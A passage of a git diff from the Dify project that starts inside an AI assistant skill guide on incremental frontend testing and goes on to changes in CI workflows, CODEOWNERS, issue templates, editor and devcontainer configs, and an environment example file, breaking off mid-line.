testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. **Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. + +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. +Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. +``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.codex/skills b/.codex/skills new file mode 120000 index 0000000000..454b8427cd --- /dev/null +++ b/.codex/skills @@ -0,0 +1 @@ +../.claude/skills \ No newline at end of file diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + api/core/rag/datasource/vdb/* diff --git a/.devcontainer/post_create_command.sh b/.devcontainer/post_create_command.sh index a26fd076ed..ce9135476f 100755 --- a/.devcontainer/post_create_command.sh +++ b/.devcontainer/post_create_command.sh @@ -6,7 +6,7 @@ cd web && pnpm install pipx install uv echo "alias start-api=\"cd $WORKSPACE_ROOT/api && uv run python -m flask run --host 0.0.0.0 --port=5001 --debug\"" >> ~/.bashrc -echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor\"" >> ~/.bashrc +echo "alias start-worker=\"cd $WORKSPACE_ROOT/api && uv run python -m celery -A app.celery worker -P threads -c 1 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention\"" >> ~/.bashrc echo "alias start-web=\"cd $WORKSPACE_ROOT/web && pnpm dev\"" >> ~/.bashrc echo "alias start-web-prod=\"cd $WORKSPACE_ROOT/web && pnpm build && pnpm start\"" >> ~/.bashrc echo "alias start-containers=\"cd $WORKSPACE_ROOT/docker && docker-compose -f docker-compose.middleware.yaml -p dify --env-file middleware.env up -d\"" >> ~/.bashrc diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 94e5b0f969..4bc4f085c2 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -6,9 +6,23 @@ * @crazywoola @laipz8200 @Yeuoly +# CODEOWNERS file +.github/CODEOWNERS @laipz8200 @crazywoola + +# Docs +docs/ @crazywoola + # Backend (default owner, more specific rules below will override) api/ @QuantumGhost +# Backend - MCP +api/core/mcp/ @Nov1c444 +api/core/entities/mcp_provider.py @Nov1c444 +api/services/tools/mcp_tools_manage_service.py @Nov1c444 +api/controllers/mcp/ @Nov1c444 +api/controllers/console/app/mcp_server.py @Nov1c444 +api/tests/**/*mcp* @Nov1c444 + # Backend - Workflow - Engine (Core graph execution engine) api/core/workflow/graph_engine/ @laipz8200 @QuantumGhost api/core/workflow/runtime/ @laipz8200 @QuantumGhost @@ -108,11 +122,17 @@ api/controllers/console/feature.py @GarfieldDai @GareArc api/controllers/web/feature.py @GarfieldDai @GareArc # Backend - Database Migrations -api/migrations/ @snakevash @laipz8200 +api/migrations/ @snakevash @laipz8200 @MRZHUH + +# Backend - Vector DB Middleware +api/configs/middleware/vdb/* @JohnJyong # Frontend web/ @iamjoel +# Frontend - Web Tests +.github/workflows/web-tests.yml @iamjoel + # Frontend - App - Orchestration web/app/components/workflow/ @iamjoel @zxhlyh web/app/components/workflow-app/ @iamjoel @zxhlyh @@ -184,6 +204,7 @@ web/app/components/plugins/marketplace/ @iamjoel @Yessenia-d web/app/signin/ @douxc @iamjoel web/app/signup/ @douxc @iamjoel web/app/reset-password/ @douxc @iamjoel + web/app/install/ @douxc @iamjoel web/app/init/ @douxc @iamjoel web/app/forgot-password/ @douxc @iamjoel @@ -224,3 +245,6 @@ web/app/education-apply/ @iamjoel @zxhlyh # Frontend - Workspace web/app/components/header/account-dropdown/workplace-selector/ @iamjoel @zxhlyh + +# Docker +docker/* @laipz8200 diff --git a/.github/ISSUE_TEMPLATE/refactor.yml b/.github/ISSUE_TEMPLATE/refactor.yml index cf74dcc546..dbe8cbb602 100644 --- a/.github/ISSUE_TEMPLATE/refactor.yml +++ b/.github/ISSUE_TEMPLATE/refactor.yml @@ -1,8 +1,6 @@ -name: "✨ Refactor" -description: Refactor existing code for improved readability and maintainability. -title: "[Chore/Refactor] " -labels: - - refactor +name: "✨ Refactor or Chore" +description: Refactor existing code or perform maintenance chores to improve readability and reliability. +title: "[Refactor/Chore] " body: - type: checkboxes attributes: @@ -11,7 +9,7 @@ body: options: - label: I have read the [Contributing Guide](https://github.com/langgenius/dify/blob/main/CONTRIBUTING.md) and [Language Policy](https://github.com/langgenius/dify/issues/1542). required: true - - label: This is only for refactoring, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general). + - label: This is only for refactors or chores; if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general). required: true - label: I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones. required: true @@ -25,14 +23,14 @@ body: id: description attributes: label: Description - placeholder: "Describe the refactor you are proposing." + placeholder: "Describe the refactor or chore you are proposing." validations: required: true - type: textarea id: motivation attributes: label: Motivation - placeholder: "Explain why this refactor is necessary." + placeholder: "Explain why this refactor or chore is necessary." validations: required: false - type: textarea diff --git a/.github/ISSUE_TEMPLATE/tracker.yml b/.github/ISSUE_TEMPLATE/tracker.yml deleted file mode 100644 index 35fedefc75..0000000000 --- a/.github/ISSUE_TEMPLATE/tracker.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: "👾 Tracker" -description: For inner usages, please do not use this template. -title: "[Tracker] " -labels: - - tracker -body: - - type: textarea - id: content - attributes: - label: Blockers - placeholder: "- [ ] ..." - validations: - required: true diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. - -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -93,5 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - + { + echo "" + echo "
File-level coverage (click to expand)" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "
" + } >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..bafac7bd13 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -35,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. + uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -56,14 +58,15 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**/SKILL.md" - name: Install pnpm uses: pnpm/action-setup@v4 @@ -76,7 +79,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies working-directory: ./web @@ -84,7 +87,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . - uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 diff --git a/.github/workflows/semantic-pull-request.yml b/.github/workflows/semantic-pull-request.yml new file mode 100644 index 0000000000..b15c26a096 --- /dev/null +++ b/.github/workflows/semantic-pull-request.yml @@ -0,0 +1,21 @@ +name: Semantic Pull Request + +on: + pull_request: + types: + - opened + - edited + - reopened + - synchronize + +jobs: + lint: + name: Validate PR title + permissions: + pull-requests: read + runs-on: ubuntu-latest + steps: + - name: Check title + uses: amannn/action-semantic-pull-request@v6.1.1 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/style.yml b/.github/workflows/style.yml index 5a8a34be79..2fb8121f74 100644 --- a/.github/workflows/style.yml +++ b/.github/workflows/style.yml @@ -90,7 +90,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies if: steps.changed-files.outputs.any_changed == 'true' diff --git a/.github/workflows/translate-i18n-base-on-english.yml b/.github/workflows/translate-i18n-base-on-english.yml index fe8e2ebc2b..8bb82d5d44 100644 --- a/.github/workflows/translate-i18n-base-on-english.yml +++ b/.github/workflows/translate-i18n-base-on-english.yml @@ -55,7 +55,7 @@ jobs: with: node-version: 'lts/*' cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Install dependencies if: env.FILES_CHANGED == 'true' diff --git a/.github/workflows/web-tests.yml b/.github/workflows/web-tests.yml index 3313e58614..b1f32f96c2 100644 --- a/.github/workflows/web-tests.yml +++ b/.github/workflows/web-tests.yml @@ -13,6 +13,7 @@ jobs: runs-on: ubuntu-latest defaults: run: + shell: bash working-directory: ./web steps: @@ -21,14 +22,7 @@ jobs: with: persist-credentials: false - - name: Check changed files - id: changed-files - uses: tj-actions/changed-files@v46 - with: - files: web/** - - name: Install pnpm - if: steps.changed-files.outputs.any_changed == 'true' uses: pnpm/action-setup@v4 with: package_json_file: web/package.json @@ -36,23 +30,355 @@ jobs: - name: Setup Node.js uses: actions/setup-node@v4 - if: steps.changed-files.outputs.any_changed == 'true' with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml + + - name: Restore Jest cache + uses: actions/cache@v4 + with: + path: web/.cache/jest + key: ${{ runner.os }}-jest-${{ hashFiles('web/pnpm-lock.yaml') }} + restore-keys: | + ${{ runner.os }}-jest- - name: Install dependencies - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm install --frozen-lockfile - name: Check i18n types synchronization - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm run check:i18n-types - name: Run tests - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web - run: pnpm test + run: | + pnpm exec jest \ + --ci \ + --maxWorkers=100% \ + --coverage \ + --passWithNoTests + + - name: Coverage Summary + if: always() + id: coverage-summary + run: | + set -eo pipefail + + COVERAGE_FILE="coverage/coverage-final.json" + COVERAGE_SUMMARY_FILE="coverage/coverage-summary.json" + + if [ ! -f "$COVERAGE_FILE" ] && [ ! -f "$COVERAGE_SUMMARY_FILE" ]; then + echo "has_coverage=false" >> "$GITHUB_OUTPUT" + echo "### 🚨 Test Coverage Report :test_tube:" >> "$GITHUB_STEP_SUMMARY" + echo "Coverage data not found. Ensure Jest runs with coverage enabled." >> "$GITHUB_STEP_SUMMARY" + exit 0 + fi + + echo "has_coverage=true" >> "$GITHUB_OUTPUT" + + node <<'NODE' >> "$GITHUB_STEP_SUMMARY" + const fs = require('fs'); + const path = require('path'); + let libCoverage = null; + + try { + libCoverage = require('istanbul-lib-coverage'); + } catch (error) { + libCoverage = null; + } + + const summaryPath = path.join('coverage', 'coverage-summary.json'); + const finalPath = path.join('coverage', 'coverage-final.json'); + + const hasSummary = fs.existsSync(summaryPath); + const hasFinal = fs.existsSync(finalPath); + + if (!hasSummary && !hasFinal) { + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('No coverage data found.'); + process.exit(0); + } + + const summary = hasSummary + ? JSON.parse(fs.readFileSync(summaryPath, 'utf8')) + : null; + const coverage = hasFinal + ? JSON.parse(fs.readFileSync(finalPath, 'utf8')) + : null; + + const getLineCoverageFromStatements = (statementMap, statementHits) => { + const lineHits = {}; + + if (!statementMap || !statementHits) { + return lineHits; + } + + Object.entries(statementMap).forEach(([key, statement]) => { + const line = statement?.start?.line; + if (!line) { + return; + } + const hits = statementHits[key] ?? 0; + const previous = lineHits[line]; + lineHits[line] = previous === undefined ? hits : Math.max(previous, hits); + }); + + return lineHits; + }; + + const getFileCoverage = (entry) => ( + libCoverage ? libCoverage.createFileCoverage(entry) : null + ); + + const getLineHits = (entry, fileCoverage) => { + const lineHits = entry.l ?? {}; + if (Object.keys(lineHits).length > 0) { + return lineHits; + } + if (fileCoverage) { + return fileCoverage.getLineCoverage(); + } + return getLineCoverageFromStatements(entry.statementMap ?? {}, entry.s ?? {}); + }; + + const getUncoveredLines = (entry, fileCoverage, lineHits) => { + if (lineHits && Object.keys(lineHits).length > 0) { + return Object.entries(lineHits) + .filter(([, count]) => count === 0) + .map(([line]) => Number(line)) + .sort((a, b) => a - b); + } + if (fileCoverage) { + return fileCoverage.getUncoveredLines(); + } + return []; + }; + + const totals = { + lines: { covered: 0, total: 0 }, + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + }; + const fileSummaries = []; + + if (summary) { + const totalEntry = summary.total ?? {}; + ['lines', 'statements', 'branches', 'functions'].forEach((key) => { + if (totalEntry[key]) { + totals[key].covered = totalEntry[key].covered ?? 0; + totals[key].total = totalEntry[key].total ?? 0; + } + }); + + Object.entries(summary) + .filter(([file]) => file !== 'total') + .forEach(([file, data]) => { + fileSummaries.push({ + file, + pct: data.lines?.pct ?? data.statements?.pct ?? 0, + lines: { + covered: data.lines?.covered ?? 0, + total: data.lines?.total ?? 0, + }, + }); + }); + } else if (coverage) { + Object.entries(coverage).forEach(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? {}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + totals.lines.total += lineTotal; + totals.lines.covered += lineCovered; + totals.statements.total += statementTotal; + totals.statements.covered += statementCovered; + totals.branches.total += branchTotal; + totals.branches.covered += branchCovered; + totals.functions.total += functionTotal; + totals.functions.covered += functionCovered; + + const pct = (covered, tot) => (tot > 0 ? (covered / tot) * 100 : 0); + + fileSummaries.push({ + file, + pct: pct(lineCovered || statementCovered, lineTotal || statementTotal), + lines: { + covered: lineCovered || statementCovered, + total: lineTotal || statementTotal, + }, + }); + }); + } + + const pct = (covered, tot) => (tot > 0 ? ((covered / tot) * 100).toFixed(2) : '0.00'); + + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('| Metric | Coverage | Covered / Total |'); + console.log('|--------|----------|-----------------|'); + console.log(`| Lines | ${pct(totals.lines.covered, totals.lines.total)}% | ${totals.lines.covered} / ${totals.lines.total} |`); + console.log(`| Statements | ${pct(totals.statements.covered, totals.statements.total)}% | ${totals.statements.covered} / ${totals.statements.total} |`); + console.log(`| Branches | ${pct(totals.branches.covered, totals.branches.total)}% | ${totals.branches.covered} / ${totals.branches.total} |`); + console.log(`| Functions | ${pct(totals.functions.covered, totals.functions.total)}% | ${totals.functions.covered} / ${totals.functions.total} |`); + + console.log(''); + console.log('
File coverage (lowest lines first)'); + console.log(''); + console.log('```'); + fileSummaries + .sort((a, b) => (a.pct - b.pct) || (b.lines.total - a.lines.total)) + .slice(0, 25) + .forEach(({ file, pct, lines }) => { + console.log(`${pct.toFixed(2)}%\t${lines.covered}/${lines.total}\t${file}`); + }); + console.log('```'); + console.log('
'); + + if (coverage) { + const pctValue = (covered, tot) => { + if (tot === 0) { + return '0'; + } + return ((covered / tot) * 100) + .toFixed(2) + .replace(/\.?0+$/, ''); + }; + + const formatLineRanges = (lines) => { + if (lines.length === 0) { + return ''; + } + const ranges = []; + let start = lines[0]; + let end = lines[0]; + + for (let i = 1; i < lines.length; i += 1) { + const current = lines[i]; + if (current === end + 1) { + end = current; + continue; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + start = current; + end = current; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + return ranges.join(','); + }; + + const tableTotals = { + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + lines: { covered: 0, total: 0 }, + }; + const tableRows = Object.entries(coverage) + .map(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? {}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + tableTotals.lines.total += lineTotal; + tableTotals.lines.covered += lineCovered; + tableTotals.statements.total += statementTotal; + tableTotals.statements.covered += statementCovered; + tableTotals.branches.total += branchTotal; + tableTotals.branches.covered += branchCovered; + tableTotals.functions.total += functionTotal; + tableTotals.functions.covered += functionCovered; + + const uncoveredLines = getUncoveredLines(entry, fileCoverage, lineHits); + + const filePath = entry.path ?? file; + const relativePath = path.isAbsolute(filePath) + ? path.relative(process.cwd(), filePath) + : filePath; + + return { + file: relativePath || file, + statements: pctValue(statementCovered, statementTotal), + branches: pctValue(branchCovered, branchTotal), + functions: pctValue(functionCovered, functionTotal), + lines: pctValue(lineCovered, lineTotal), + uncovered: formatLineRanges(uncoveredLines), + }; + }) + .sort((a, b) => a.file.localeCompare(b.file)); + + const columns = [ + { key: 'file', header: 'File', align: 'left' }, + { key: 'statements', header: '% Stmts', align: 'right' }, + { key: 'branches', header: '% Branch', align: 'right' }, + { key: 'functions', header: '% Funcs', align: 'right' }, + { key: 'lines', header: '% Lines', align: 'right' }, + { key: 'uncovered', header: 'Uncovered Line #s', align: 'left' }, + ]; + + const allFilesRow = { + file: 'All files', + statements: pctValue(tableTotals.statements.covered, tableTotals.statements.total), + branches: pctValue(tableTotals.branches.covered, tableTotals.branches.total), + functions: pctValue(tableTotals.functions.covered, tableTotals.functions.total), + lines: pctValue(tableTotals.lines.covered, tableTotals.lines.total), + uncovered: '', + }; + + const rowsForOutput = [allFilesRow, ...tableRows]; + const formatRow = (row) => `| ${columns + .map(({ key }) => String(row[key] ?? '')) + .join(' | ')} |`; + const headerRow = `| ${columns.map(({ header }) => header).join(' | ')} |`; + const dividerRow = `| ${columns + .map(({ align }) => (align === 'right' ? '---:' : ':---')) + .join(' | ')} |`; + + console.log(''); + console.log('
Jest coverage table'); + console.log(''); + console.log(headerRow); + console.log(dividerRow); + rowsForOutput.forEach((row) => console.log(formatRow(row))); + console.log('
'); + } + NODE + + - name: Upload Coverage Artifact + if: steps.coverage-summary.outputs.has_coverage == 'true' + uses: actions/upload-artifact@v4 + with: + name: web-coverage-report + path: web/coverage + retention-days: 30 + if-no-files-found: error diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/.nvmrc b/.nvmrc new file mode 100644 index 0000000000..7af24b7ddb --- /dev/null +++ b/.nvmrc @@ -0,0 +1 @@ +22.11.0 diff --git a/.vscode/launch.json.template b/.vscode/launch.json.template index cb934d01b5..bdded1e73e 100644 --- a/.vscode/launch.json.template +++ b/.vscode/launch.json.template @@ -37,7 +37,7 @@ "-c", "1", "-Q", - "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor", + "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention", "--loglevel", "INFO" ], diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. -- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. diff --git a/api/.env.example b/api/.env.example index 35aaabbc10..b87d9c7b02 100644 --- a/api/.env.example +++ b/api/.env.example @@ -543,6 +543,25 @@ APP_MAX_EXECUTION_TIME=1200 APP_DEFAULT_ACTIVE_REQUESTS=0 APP_MAX_ACTIVE_REQUESTS=0 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for 